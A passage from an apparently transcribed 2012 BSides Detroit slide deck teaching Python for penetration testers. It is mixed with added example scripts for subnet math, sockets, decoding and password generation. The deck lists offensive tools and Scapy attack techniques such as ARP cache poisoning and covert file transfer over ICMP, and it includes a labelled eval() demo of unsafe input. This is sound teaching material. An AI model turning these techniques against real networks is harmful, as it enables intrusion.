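    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def subnet_info(text):
    """All the values Subnetcalc.py reports, as a dict, from one 'a.b.c.d/n' string."""
    ip_int, prefix = parse_cidr(text)
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF   # prefix ones, then zeros
    network = ip_int & mask
    broadcast = network | (~mask & 0xFFFFFFFF)
    if prefix >= 31:
        # /31 (RFC 3021 point-to-point) and /32: no network/broadcast reservation
        first_host, last_host = network, broadcast
        usable = 2 ** (32 - prefix)
    else:
        first_host, last_host = network + 1, broadcast - 1
        usable = 2 ** (32 - prefix) - 2
    return {
        "address": int_to_dotted(ip_int),
        "netmask": int_to_dotted(mask),
        "network": int_to_dotted(network),
        "broadcast": int_to_dotted(broadcast),
        "first_host": int_to_dotted(first_host),
        "last_host": int_to_dotted(last_host),
        "usable_hosts": usable,
        # convention assumed here (common in subnet calculators): gateway = first usable host
        "gateway": int_to_dotted(first_host),
    }


def matches_stdlib(text):
    """Cross-check the hand-rolled arithmetic against ipaddress (strict=False keeps host bits)."""
    net = ipaddress.ip_network(text, strict=False)
    info = subnet_info(text)
    return (str(net.network_address) == info["network"]
            and str(net.broadcast_address) == info["broadcast"]
            and str(net.netmask) == info["netmask"])


if __name__ == "__main__":
    # usage: python subnetcalc.py 192.168.1.10/24 10.0.0.77/26
    for arg in sys.argv[1:] or ["192.168.1.10/24"]:   # constructed default sample
        print("== %s ==" % arg)
        for key, value in subnet_info(arg).items():
            print("%-12s %s" % (key, value))
```

The mask is built by shifting all-ones left and truncating to 32 bits, so /0 and /32 fall out of the same expression; everything else (network, broadcast, host range) is one AND or OR away from it.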
Coding for Penetration Testers book (continued)
Script | Function | Learned
network_socket_argument.py | Connect to website, pull contents (site specified by argument) | 1. Network socket creation; 2. Spaces will bite you in the ass where you least expect it.
Server_connect.py | Once a connection is made, send back a string | 1. Network socket creation; 2. Allow incoming connections.
receiveICMP.py | To receive a file from another system via ICMP (in conjunction with sendICMP.py) | 1. Python script using Scapy
sendICMP.py | To send a file to another system via ICMP (in conjunction with receiveICMP.py) | 1. Python script using Scapy
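The socket rows in the two tables above (Webcheck_v1.py, Network_socket.py and Server_connect.py) share one set of lessons: create a socket, accept or make a connection, send a hand-built GET, and get the request text exactly right. Here is an added example for this page, not the book's scripts and not the deck's code, that puts the three sides together on localhost so it runs offline: a one-shot listener that answers with a string, a raw-socket client that sends a GET and reads until EOF, and a monitor check built on the client. Function names are assumptions made here and BANNER is a constructed reply, not real server output.

```python
import socket
import threading

# Constructed reply for the toy listener (not real server output).
BANNER = (b"HTTP/1.0 200 OK\r\n"
          b"Content-Type: text/plain\r\n\r\n"
          b"hello from the toy server\r\n")


def start_toy_server(host="127.0.0.1"):
    """Server_connect.py-style listener (assumed name): accept exactly one client,
    record what it sent, answer with BANNER, then close the listening socket.
    Returns (port, record); record["request"] holds the client's bytes afterwards."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))            # port 0: the OS picks a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    record = {"request": None}

    def handle_one():
        conn, _peer = srv.accept()
        with conn:
            conn.settimeout(5)
            record["request"] = conn.recv(4096)
            conn.sendall(BANNER)    # closing conn afterwards gives the client its EOF
        srv.close()

    threading.Thread(target=handle_one, daemon=True).start()
    return port, record


def http_get(host, port, path="/"):
    """Network_socket.py-style client (assumed name): raw TCP socket, hand-built GET.
    The request line needs exactly one space between its three fields, CRLF line
    endings and a blank line to end the headers; that is where the 'spaces will
    bite you' lesson applies."""
    request = "GET {} HTTP/1.0\r\nHost: {}\r\n\r\n".format(path, host)
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(request.encode("ascii"))
        chunks = []
        while True:                 # read until the server closes the connection
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def web_is_up(host, port=80):
    """Webcheck_v1.py-style monitor (assumed name): True only if a GET comes back
    with an HTTP status line; refused, timed out or garbage replies all count as down."""
    try:
        reply = http_get(host, port)
    except OSError:                 # covers ConnectionRefusedError and socket.timeout
        return False
    return reply.startswith(b"HTTP/")


def find_closed_port(host="127.0.0.1"):
    """Bind to port 0 and release it: a port nothing is listening on, for a negative check."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    import sys
    port, record = start_toy_server()
    print(http_get("127.0.0.1", port).decode())
    print("server saw:", record["request"])
    # usage as a monitor: python webcheck.py host [port]
    if len(sys.argv) > 1:
        target = sys.argv[1]
        target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        print(target, "is", "UP" if web_is_up(target, target_port) else "DOWN")
```

Reading until recv() returns empty bytes is what makes the client correct for HTTP/1.0, where the server closes the connection to mark the end of the body; a single recv() call, which is the usual first attempt, returns whatever happened to arrive first.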
Little gems I found
Description | Function | Site
Python-nmap | It’s a Python library which helps in using nmap. | http://xael.org/norman/python/python-nmap/
Python API to the VirtualBox VM | Allowing you to control every aspect of virtual machine configuration and execution | http://download.virtualbox.org/virtualbox/SDKRef.pdf
Py2Exe | py2exe is a Python Distutils extension which converts Python scripts into executable Windows programs, able to run without requiring a Python installation. | http://www.py2exe.org/
Chrome extensions/applications | Various extensions/applications found in the Chrome Webstore | see below
      • https://chrome.google.com/webstore/detail/gdiimmpmdoofmahingpgabiikimjgcia <-- Python shell (browser button)
      • https://chrome.google.com/webstore/detail/cmlchnlmkdcpelgmkebknjgjgddncelc <-- Python shell (Chrome application)
      • https://chrome.google.com/webstore/detail/nckbgikkpbjdliigbhgjfgfcahhonakp <-- Online Python development environment

Little gems I found (extra extra credit)
Description | Function | Site
Tweepy | It’s the best working Python library to interface with Twitter (so far) | http://tweepy.github.com/
Tweepy
• Direct message
• Check friends' timelines
• Create favorites

http://talkfast.org/2010/05/31/twitter-from-the-command-line-in-python-using-oauth
Tips, tricks, etc.
IDE (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments)
• Windows
      • PyScripter
      • Aptana Studio
      • IDLE
      • Ninja
      • Wing IDE
• Linux
      • IDLE
      • Geany
      • Python Toolkit
      • SPE
      • ERIC (supposed to have auto-complete of code…)


Editors (http://wiki.python.org/moin/PythonEditors)
• Windows
      • Notepad++
• Linux
      • Gedit
      • SCiTE
Tips, tricks, etc.
Shells
•   DreamPie
      • Automatic completion of attributes and file names
      • History box
      • Code box
•   IDLE
      • Included with Python install
•   Ipython
•   PyShell
•   Guake

Other
•   PythonAnywhere
      • http://pythonanywhere.com/
Tips, tricks, etc.
Linux vs. Windows

Linux
•   Linux scripts can be run via the terminal
      • by calling python <script name>
      • by putting #!/usr/bin/python (path to interpreter) at the top and typing ./<script name>
            • Common problem on PyScripter (awesome Windows Python IDE)… extra code comments are put at the top, then the #!/usr/bin/python. The #! only works as the very first line, so ./<script name> fails.

Windows
•   Windows scripts don’t need the #! but need to have .py associated with the Python interpreter.
      • Scripts can be double clicked or run from the command prompt: python <script name>
            • If the script is double clicked without having raw_input("Press ENTER to exit") you may not see the output of the script, because the console window closes as soon as the script ends.
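The two launch problems above (a comment pushed above the shebang, and a double-clicked script whose console vanishes) are easy to demonstrate. This is an added example written for this page, not code from the deck or from PyScripter: it writes the same tiny script twice into a temporary directory, once with the shebang as the first line and once with a comment above it, marks both executable and launches each the way ./<script name> does, so you can see the second one refused. The function names, the "PROMPT" heuristic for detecting an Explorer double-click, and the use of the current interpreter as the shebang target are assumptions made here; the launch test assumes a POSIX host.

```python
#!/usr/bin/env python3
# Added example: shebang placement check and a launch skeleton (not from the deck).
import os
import stat
import subprocess
import sys
import tempfile


def has_valid_shebang(source):
    """The kernel honours '#!' only when it is the very first two bytes of the file.
    A comment line above it (the PyScripter problem from the slide) makes ./script fail."""
    return source.startswith("#!")


def write_script(directory, name, text):
    """Write text as a script with LF line endings (a CRLF after '#!' also breaks on Linux)
    and set the owner execute bit, as chmod u+x would. Returns the path."""
    path = os.path.join(directory, name)
    with open(path, "w", newline="\n") as f:
        f.write(text)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def run_directly(path):
    """Launch the file as ./script would (no interpreter named). Returns its stdout,
    or None when the kernel refuses with ENOEXEC ('Exec format error')."""
    try:
        proc = subprocess.run([path], capture_output=True, text=True, timeout=30)
    except OSError:
        return None
    return proc.stdout


def demo():
    """Write the same script twice, shebang first and shebang under a comment, and
    return (stdout_good, stdout_bad). Assumption: POSIX host, and the interpreter
    running this example is usable as the shebang target."""
    shebang = "#!" + sys.executable
    body = 'print("hello from the script")\n'
    with tempfile.TemporaryDirectory() as d:
        good = write_script(d, "good.py", shebang + "\n" + body)
        bad = write_script(d, "bad.py",
                           "# header comment above the shebang\n" + shebang + "\n" + body)
        return run_directly(good), run_directly(bad)


def pause_if_double_clicked():
    """Windows only: keep the console open when launched from Explorer.
    Heuristic (assumption): cmd.exe exports PROMPT, an Explorer double-click does not."""
    if os.name == "nt" and "PROMPT" not in os.environ:
        input("Press ENTER to exit")


if __name__ == "__main__":
    good_out, bad_out = demo()
    print("shebang on first line ->", repr(good_out))
    print("comment above it      ->", repr(bad_out))
    pause_if_double_clicked()
```

has_valid_shebang() is the check to run over a script before copying it to a Linux box: the file written by an editor that prepends its own header comment will fail it, and a quick look at the first line tells you why without a round trip to the target.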
Tips, tricks, etc.
Portable Python (Windows only)
•   Portable Python is a Python® programming language preconfigured to run directly from any USB storage device, enabling you to have, at any time, a portable programming environment. Just download it, extract to your portable storage device or hard drive and in 10 minutes you are ready to create your next Python® application.
      • Portable Python 2.7.2.1 package contains the following applications/libraries:
            • PyScripter v2.4.1
            • NumPy 1.6.0
            • SciPy 0.90
            • Matplotlib 1.0.1
            • PyWin32 216
            • Django 1.3
            • PIL 1.1.7
            • Py2Exe 0.6.9
            • wxPython 2.8.12.0
      • Portable Python 3.2.1.1 package contains the following applications/libraries (alphabetical order):
            • NetworkX v1.4
            • PySerial 2.5
            • PyScripter v2.4.1
            • PyWin32 v.216
            • RPyC-3.0.7
Additional resources
Beginners guides from Python
• http://wiki.python.org/moin/BeginnersGuide/NonProgrammers
• http://wiki.python.org/moin/BeginnersGuide/Programmers
Extra tools
• http://mashable.com/2007/10/02/python-toolbox/

Online exercises
• http://codingbat.com/python
• http://homepage.mac.com/s_lott/books/python.html
• http://web.archive.org/web/20110625065328/http://diveintopython.org/toc/index.html
• http://anh.cs.luc.edu/python/hands-on/
• http://code.google.com/edu/languages/google-python-class/index.html
• http://www.cdf.toronto.edu/~csc148h/winter/
• http://www.cdf.toronto.edu/~csc108h/fall/
• http://projecteuler.net/
• http://www.upriss.org.uk/python/PythonCourse.html
• http://www.pythonchallenge.com/
• http://learnpythonthehardway.org/
• http://www.awaretek.com/tutorials.html
• http://www.checkio.org/
• http://www.pyschools.com/

General learning materials
• http://www.py4inf.com/
Free online videos
• http://freevideolectures.com/Course/2512/Python-Programming
• http://showmedo.com/videotutorials/python
• http://www.python.org/doc/av/
• http://thenewboston.org/list.php?cat=36
Online books
• http://en.wikibooks.org/wiki/Python_Programming
Online interactive tutorial/interpreter
• http://www.trypython.org
• http://www.learnpython.org/
• https://languageshells.appspot.com/
Forums
• http://www.python-forum.org
• http://stackoverflow.com/questions/tagged/python
• http://www.daniweb.com/software-development/python/114
Module/package repositories
• http://pypi.python.org/pypi The Python Package Index is a repository of software for the Python
  programming language. There are currently 17409 packages here.
• http://code.activestate.com/recipes/ The ActiveState Code Recipes contains 3850 snippets to
  learn from and use.
Python tools for penetration testers
• http://www.dirk-loss.de/python-tools.htm
Training
• SecurityTube Python Scripting Expert
      • http://securitytube-training.com/certifications/securitytube-python-scripting-expert/?id=main
           • Module 1: Python Scripting – Language Essentials
           • Module 2: System Programming and Security
           • Module 3: Network Security Programming – Sniffers
              and Packet Injectors
           • Module 4: Attacking Web Applications
           • Module 5: Exploitation Techniques
           • Module 6: Malware Analysis and Reverse Engineering
           • Module 7: Attack Task Automation
           • Module 8: Further Study and Roadmap
           • Module 9: Exam Pattern and Mock Exam

•   PYTHON TRAINING FOR SECURITY PROFESSIONALS
      • http://www.trainace.com/courses/python/
          • Log Parsing with Python
          • Pcap Parsing with Python
          • Network Attack with Python
          • Web Application Attack with Python
          • Malware Analysis with Python
          • Exploit Development with Python
All the scripts
Category | Script
CSAW Crypto Redux – Challenge 1 to 5 |
Extra credit |
Coding for Penetration Testers – part 1 |
Coding for Penetration Testers – part 2 |
Coding for Penetration Testers – part 3 |
Extra extra credit |
Etc.
Antigravity
• When you open up Module Docs and click on the antigravity module, or from IDLE run import antigravity, a web browser opens to the XKCD cartoon at the beginning of this slide deck.

Zen of Python
• To start the path of finding the Zen of Python, remember these two key words… IMPORT THIS.
      • From an IDE (IDLE) or a Python shell, run import this and the Zen of Python will be revealed.
Final thoughts
Questions?

Keith Dixon
@Tazdrumm3r
#misec – Tazdrumm3r
tazdrummer@gmail.com
http://tazdrumm3r.wordpress.com

Overview of Python - Bsides Detroit 2012

  • 2.
  • 3. Overview of Python Flying made simple without the Nyquil hangover Keith Dixon @Tazdrumm3r
  • 4. Agenda • About me • About Python • Python basics • Python’s uses • Coding for Penetration Testers book • Tips, tricks, observations • Resources
  • 5. About me Who am I? • Husband/father/geek/gets distracted by shiny objects easy • Career path switched to IT in 1999, professionally in IT since 2001 – Learning, studying, and currently interviewing for infosec professional roles • Vbscript – 2007 • Python – 2011
  • 6. About Python • Conceived in the late 1980’s by Guido van Rossum at CWI. • Python 2.0 was release on October 16th, 2000 • Python 3.0 was released on December 2008
  • 7. What is Python good for? • Python comes with a large standard library that covers areas such as; • string processing • Internet protocols • software engineering • operating system interfaces • Artificial intelligence (because of similarities to Lisp)
  • 8. What is Python good for? Extensive use in the information security industry • Exploit development • Network • Debugging • Reverse engineering • fuzzing, • Web • Forensics • Malware analysis • PDF
  • 9. What is Python good for? • Easy to write short scripts for system admin work. • Python code is easy to understand. • Once the basic syntax is learned, even the most complicated scripts can make sense.
  • 10. What is Python good for? • Python is cross platform!! • It will work on Linux, Windows, Mac and most every other OS. • Many, many resources and a big, friendly community
  • 11. Python tools • Social-Engineer Toolkit - specifically designed to perform advanced attacks against the human element. • Artillery - a honeypot/monitoring/prevention tool used to protect Linux-based systems. • Fast-Track - aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. • Scapy - send, sniff and dissect and forge network packets. Usable interactively or as a library • Pytbull - flexible IDS/IPS testing framework (shipped with more than 300 tests) • Scrapy - a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages • W3af - a Web Application Attack and Audit Framework.
  • 12. Inspiration for the idea? (Part 1)
  • 13. Inspiration for the idea? (Part 2) Post CSAW CTF
• 15. Python 101
    • Indentation does matter

    This will work:
        startNumber = int(raw_input("Enter the start number here "))
        endNumber = int(raw_input("Enter the end number here "))
        def fib(n):
            if n < 2:
                return n
            return fib(n-2) + fib(n-1)
        print map(fib, range(startNumber, endNumber))

    But this won't (the body of fib is no longer indented under the def, so Python stops with an IndentationError before running anything):
        startNumber = int(raw_input("Enter the start number here "))
        endNumber = int(raw_input("Enter the end number here "))
        def fib(n):
        if n < 2:
        return n
        return fib(n-2) + fib(n-1)
        print map(fib, range(startNumber, endNumber))
• 16. Python 101
    • All scripts are considered modules
        Entire module:      >>> import sys
        Partial method:     >>> from sys import argv
    • All functions inside a module can be used, or only certain methods can be used inside a script
    • Help is built in
        Help on modules:
            >>> import sys, hashlib
            >>> help(sys)
            >>> help(hashlib)
            keith@dw ~$ pydoc sys
            keith@dw ~$ pydoc hashlib
        Help on methods:
            >>> import sys, hashlib
            >>> help(sys.argv)
            >>> help(hashlib.sha512)
            keith@dw ~$ pydoc sys.argv
            keith@dw ~$ pydoc hashlib.sha512
• 17. Python 101
    • It can be run interactively
        Via command prompt: IDLE, DreamPie, Ipython
        Via shell:
            keith@dw ~ $ python
            Python 2.72
            Type "help", "copyright"...
            >>>
    • Scripts
        Windows
            File extensions
            • *.py – Python script
            • *.pyc – Compiled Python file (generated by running script)
            Running scripts
            • .py file extension associated with python.exe
            • Should have #!/usr/bin/python at the top of the script in case you want to run it on Linux
            • If the path to the interpreter is in your system path, you can double-click the script to run it, otherwise…
                C:\Users\Keith>python password.py
        Linux
            File extensions (optional)
            • *.py – Python script
            • *.pyc – Compiled Python file (generated by running script)
            Running scripts
            • Must have #!/usr/bin/python (path to python) at the top of the script
            • If you're running it from the terminal, the script must be chmod'ed to make it executable, or you can call python and the script name…
                keith@dw ~ $ python password.py
• 18. Python 102
    • Data types
        Numbers
            A = 10
            B = 0100 or B = 0x41 or B = 0b1000000
            C = 3.56
            D = 3.16j
            • Integers
            • Long integers (octal, hex, binary)
            • Float
            • complex
        String
            A = 'This is a string'
            print A                                → 'This is a string'
            print A[0]                             → 'T'
            print A[3:6]                           → 's i'
            print A[4:]                            → ' is a string'
            print A * 2
            print A + " and this is how it prints"
        List (mutable)
            list = ['abc', 45, 'The Avengers', 0x67, 'def', 15.5]
            print list
            print list[0]
            print list[1:3]
            print list[2:]
            list.append("Detroit")
            → list = ['abc', 45, 'The Avengers', 0x67, 'def', 15.5, 'Detroit']
        Tuple (non mutable)
            list = ('abc', 45, 'The Avengers', 0x67, 'def', 15.5)
            print list
            print list[0]
            print list[1:3]
            print list[2:]
            list.append("Detroit")
            → AttributeError: 'tuple' object has no attribute 'append'
    • Conditional statements
        If statement
            if x == True:
                print True
        Else statement
            if x == 1:
                print "1"
            else:
                print "not 1"
        Elif statement
            if expression1:
                statement(s)
            elif expression2:
                statement(s)
            else:
                statement(s)
• 19. Python 102
    • Looping
        While loop
            count = 0
            while (count < 9):
                print 'The count is:', count
                count = count + 1
            print "Good bye!"
        For loop
            import sys
            code1 = (sys.argv[1])
            code_split = code1.split(':')
            for i in code_split:
                code1a = int(i)
                codefinal = chr(code1a)
                sys.stdout.write(codefinal)
        Loop control
            count = 0
            while (count < 9):
                print 'The count is:', count
                count = count + 1
                if count == 7:
                    break
            print "Good bye!"
    • Functions
        Creating a function
            def base64_decode(base64_key):
                answer=base64_key.decode('base64','strict')
                print answer
        In use
            >>> csaw.base64_decode('V2VsY29tZSB0byBCc2lkZXMgRGV0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnlhbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yIGFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2UgdGhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==')
            Welcome to Bsides Detroit 2012. Make sure to thank Ryan, Steven, Wolfgang, and Kyle for all the hard work they did to make this year such a success!
• 20. Python 102
    • Files
        Open a file for reading
            #!/usr/bin/python
            f = open('base64.txt', 'r')
            file = f.read()
            answer=file.decode('base64','strict')
            print answer
            f.close()
        Write to a file
            #!/usr/bin/python
            import sys
            if len(sys.argv)<2:
                sys.exit("Usage " + sys.argv[0] + " <Base64 code you wish to decode>\n")
            basecode = sys.argv[1]
            answer=basecode.decode('base64','strict')
            print answer
            fo = open("base64.txt", "w")
            fo.write(answer)
            fo.close()
    • Input/output
        raw_input
            #!/usr/bin/python
            str = raw_input("Enter your input: ")
            print "Received input is : ", str
            Input is → Thanks for coming to Bsides
            Output is → Received input is : Thanks for coming to Bsides
        input
            #!/usr/bin/python
            str = input("Enter your input: ")
            print "Received input is : ", str
            Input is → 5 * 5
            Output is → 25
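The `input` column on slide 20 shows the point that matters for security: Python 2's input() ran eval() on whatever was typed, which is why "5 * 5" came back as 25. The following is an added example, not code from the deck, written for Python 3 (where input() returns a plain string) and fed constructed inputs instead of a terminal prompt; the function names are my own.

```python
"""Added example (not from the slide deck): reading a user-supplied number
without Python 2's input()-calls-eval() behaviour. Runs on Python 3."""
import ast


def python2_style_input(text):
    """What Python 2's input() did: eval() the raw text. Kept only to reproduce
    the slide's "5 * 5" -> 25 result; never do this with untrusted input."""
    return eval(text)


def parse_count(text, lower=1, upper=10000):
    """Safe replacement for reading a count (e.g. a password length):
    accept only a decimal integer inside an explicit range."""
    text = text.strip()
    if not text.isdigit():
        raise ValueError("expected a non-negative decimal integer, got %r" % text)
    value = int(text)
    if not lower <= value <= upper:
        raise ValueError("%d is outside the allowed range %d..%d" % (value, lower, upper))
    return value


def parse_literal(text):
    """When structured input is really needed, ast.literal_eval accepts Python
    literals (numbers, strings, lists, dicts) but refuses names, calls and
    operators, so "5 * 5" is rejected rather than computed."""
    try:
        return ast.literal_eval(text.strip())
    except (ValueError, SyntaxError) as exc:
        raise ValueError("not a plain literal: %r" % text) from exc


def demo(samples=("25", "5 * 5", "-3", "99999", "2 ** 64")):
    """Constructed inputs: report what each safe parser does with each sample."""
    report = {}
    for sample in samples:
        row = {}
        for name, fn in (("parse_count", parse_count), ("parse_literal", parse_literal)):
            try:
                row[name] = fn(sample)
            except ValueError:
                row[name] = "rejected"
        report[sample] = row
    return report


if __name__ == "__main__":
    print("Python 2 input() style:", python2_style_input("5 * 5"))
    for sample, row in demo().items():
        print("%-10r %s" % (sample, row))
```

parse_count is the right tool when the script wants a number (as the password generator on slide 26 does); parse_literal is for the rare case where a list or dict has to be typed in, and it still never executes code.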
  • 21. Python’s uses – General scripting • Cryptography • Password creation • Use files (write to/read from)
• 22. Cryptography
    Encode Base64 code
        #!/usr/bin/python
        code = raw_input("Enter the data you wish to be encoded to Base64")
        answer=code.encode('base64','strict')
        print answer
    Encode ROT13 code
        #!/usr/bin/python
        code = raw_input("Enter the data you wish to be encoded to ROT13")
        answer=code.encode('rot13','strict')
        print answer
• 23. Decrypt module
    #!/usr/bin/python
    import sys

    def hexdecode(hex_key):
        import binascii
        hex_split = hex_key.split(':')
        for decode in hex_split:
            hex_decode = binascii.a2b_hex(decode)
            sys.stdout.write(hex_decode)

    def uni_decode(unicode_key):
        unicode_split=unicode_key.split(':')
        for i in unicode_split:
            code1a = int(i)
            codefinal = chr(code1a)
            sys.stdout.write(codefinal)

    def base64_decode(base64_key):
        answer=base64_key.decode('base64','strict')
        print answer

    def binary_decode(binary_key):
        import math
        f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))]
        basecode = f(binary_key,8)
        for code in basecode:
            decodea = int(code,2)
            decodeb = chr(decodea)
            sys.stdout.write(decodeb)

    def rot13_decode(rot13_key):
        answer=rot13_key.decode('rot13','strict')
        print answer
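The encoders on slide 22 and the decrypt module on slide 23 rely on Python 2's str.decode('base64') and str.decode('rot13'), which no longer exist in Python 3. As an added example (not the deck's code), here are the same five decoders for Python 3, returning text instead of writing to stdout so their results can be checked, and rejecting malformed input instead of truncating it. The base64 string is the one the deck decodes on slide 19; the hex, decimal, binary and ROT13 samples are constructed for this example.

```python
"""Added example, not the deck's code: the decrypt-module helpers for Python 3."""
import base64
import binascii
import codecs

# The base64 string decoded on slide 19 of the deck.
CSAW_BASE64 = (
    "V2VsY29tZSB0byBCc2lkZXMgRGV0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnlh"
    "biwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yIGFsbCB0aGUgaGFyZCB3b3JrIHRo"
    "ZXkgZGlkIHRvIG1ha2UgdGhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ=="
)


def hexdecode(hex_key):
    """Colon-separated hex bytes, e.g. '42:73' -> 'Bs' (slide's hexdecode)."""
    try:
        raw = b"".join(binascii.a2b_hex(part) for part in hex_key.split(":"))
    except binascii.Error as exc:          # odd length or non-hex digit
        raise ValueError("bad hex chunk in %r" % hex_key) from exc
    return raw.decode("utf-8", errors="replace")


def uni_decode(unicode_key):
    """Colon-separated decimal code points, e.g. '68:101' -> 'De' (slide's uni_decode)."""
    return "".join(chr(int(part)) for part in unicode_key.split(":"))


def base64_decode(base64_key):
    """validate=True plays the role of the slide's 'strict' handler: characters
    outside the base64 alphabet raise instead of being silently skipped."""
    try:
        return base64.b64decode(base64_key, validate=True).decode("utf-8")
    except binascii.Error as exc:
        raise ValueError("not valid base64: %r..." % base64_key[:16]) from exc


def binary_decode(binary_key):
    """8-bit groups, e.g. '0100100001101001' -> 'Hi'. The slide's lambda used
    ceil() and would hand a short last group to int(); here the length and
    alphabet are checked first."""
    digits = binary_key.replace(" ", "")
    if len(digits) % 8 or digits.strip("01"):
        raise ValueError("binary input must be a multiple of 8 bits of 0/1")
    return "".join(chr(int(digits[i:i + 8], 2)) for i in range(0, len(digits), 8))


def rot13_decode(rot13_key):
    """codecs.decode(..., 'rot_13') replaces Python 2's str.decode('rot13')."""
    return codecs.decode(rot13_key, "rot_13")


def demo():
    """Run every decoder on a constructed sample (base64 sample is from the deck)."""
    return {
        "hex": hexdecode("42:73:69:64:65:73"),
        "unicode": uni_decode("68:101:116:114:111:105:116"),
        "binary": binary_decode("0100100001101001"),
        "rot13": rot13_decode("Jrypbzr"),
        "base64": base64_decode(CSAW_BASE64),
    }


if __name__ == "__main__":
    for name, text in demo().items():
        print("%-8s %s" % (name, text))
```

Each decoder is a plain function returning a str, so the same module can be imported from an interactive shell exactly as the deck does with csaw.base64_decode(...) on slide 19.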
• 26. Password creation
    ##Author: ATC
    ##Please score this on activestate
    import string, random

    print "How many characters would you like the password to have?"
    print "Must be nine or more"
    length = input()
    password_len = length
    password = []
    for group in (string.ascii_letters, string.punctuation, string.digits):
        password += random.sample(group, 3)
    password += random.sample(
        string.ascii_letters + string.punctuation + string.digits,
        password_len - len(password))
    random.shuffle(password)
    password = ''.join(password)
    print password

    http://code.activestate.com/recipes/577905-password-generator/
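The recipe above draws from Python's `random` module, a Mersenne Twister that is not meant for secrets, and reads the length with Python 2's eval-based input(). As an added example (not the ActiveState recipe and not the deck's code), here is the same scheme for Python 3, three guaranteed characters from each class, fill to the requested length, then shuffle, using the `secrets` module's OS-backed generator; the length is a parameter rather than a prompt. One deliberate change: the filler characters are drawn with replacement (secrets.choice) rather than with random.sample, which never repeats a character and so needlessly shrinks the space of possible passwords.

```python
"""Added example, not the deck's code: the slide's password scheme on a CSPRNG."""
import secrets
import string

CHAR_CLASSES = (string.ascii_letters, string.punctuation, string.digits)
PER_CLASS = 3                                   # the recipe guarantees three per class
MIN_LENGTH = PER_CLASS * len(CHAR_CLASSES)      # 9, the recipe's "must be nine or more"


def generate_password(length):
    """Return a password of exactly `length` characters with at least
    PER_CLASS letters, PER_CLASS punctuation marks and PER_CLASS digits."""
    if length < MIN_LENGTH:
        raise ValueError("length must be at least %d" % MIN_LENGTH)
    rng = secrets.SystemRandom()                # os.urandom-backed, unlike random.*
    chars = []
    for group in CHAR_CLASSES:
        chars.extend(rng.sample(group, PER_CLASS))
    alphabet = "".join(CHAR_CLASSES)
    chars.extend(secrets.choice(alphabet) for _ in range(length - len(chars)))
    rng.shuffle(chars)                          # so the class order is not predictable
    return "".join(chars)


def meets_policy(password):
    """True when the password satisfies the recipe's per-class minimums."""
    return len(password) >= MIN_LENGTH and all(
        sum(ch in group for ch in password) >= PER_CLASS for group in CHAR_CLASSES
    )


if __name__ == "__main__":
    pw = generate_password(16)
    print(pw, meets_policy(pw))
```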
• 27. Use files (write to/read from)
    Read from a file
        #!/usr/bin/python
        f = open('base64.txt', 'r')
        file = f.read()
        answer=file.decode('base64','strict')
        f.close()
    Write to a file
        #!/usr/bin/python
        code = raw_input("Enter the data you wish to be encoded to Base64")
        answer=code.encode('base64','strict')
        f=open('base64.txt','w')
        line=f.write(answer)
        f.close()
• 28. Python's uses – Networking
    • Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
    • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
    • Mallory: man-in-the-middle proxy for testing
    • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
    • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
    • Knock Subdomain Scan: enumerate subdomains on a target domain through a wordlist
    • pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
    • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
    • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
    • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
    • Dirtbags py-pcap: read pcap files without libpcap
    • flowgrep: grep through packet payloads using regular expressions
    • httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries
    http://www.dirk-loss.de/python-tools.htm
• 29. Scapy www.secdev.org/projects/scapy/
    • Packet creation
    • Read PCAP files
    • Create graphical dumps
        • Must have appropriate supporting tools installed
    • Fuzzing
    • Send and receive packets
    • TCP traceroute (can do graphical dump as well)
    • Sniffing
    • Send and receive files through alternate data channels (ICMP)
    • Ping
        • ARP ping
        • ICMP ping
        • TCP ping
        • UDP ping
    • Classic attacks
        • Malformed packets
        • Ping of death
        • Nestea attack
        • ARP cache poisoning
    • Scans
        • SYN scan
        • ACK scan
        • XMAS scan
        • IP scan
        • TCP port scan
        • IKE scan
    • Advanced traceroute
        • TCP SYN traceroute
        • UDP traceroute
        • DNS traceroute
    • VLAN hopping
    • Wireless frame injection
    • Wireless sniffing
    • OS Fingerprinting
    • Firewalking
  • 30. Scapy • Packet creation • Stacking layers
• 31. Scapy
    • Read PCAP files
        A=rdpcap("<directory where PCAP file is>/<pcap file>")
    • Create graphical dumps
        A[<packet number>].psdump("<location to store .eps file>", layer_shift=1)
• 33. Scapy
    Send packets
    • send(IP(dst="192.168.1.1")/ICMP())
    • sendp(Ether()/IP(dst="192.168.1.1",ttl=(1,4)), iface="eth0")
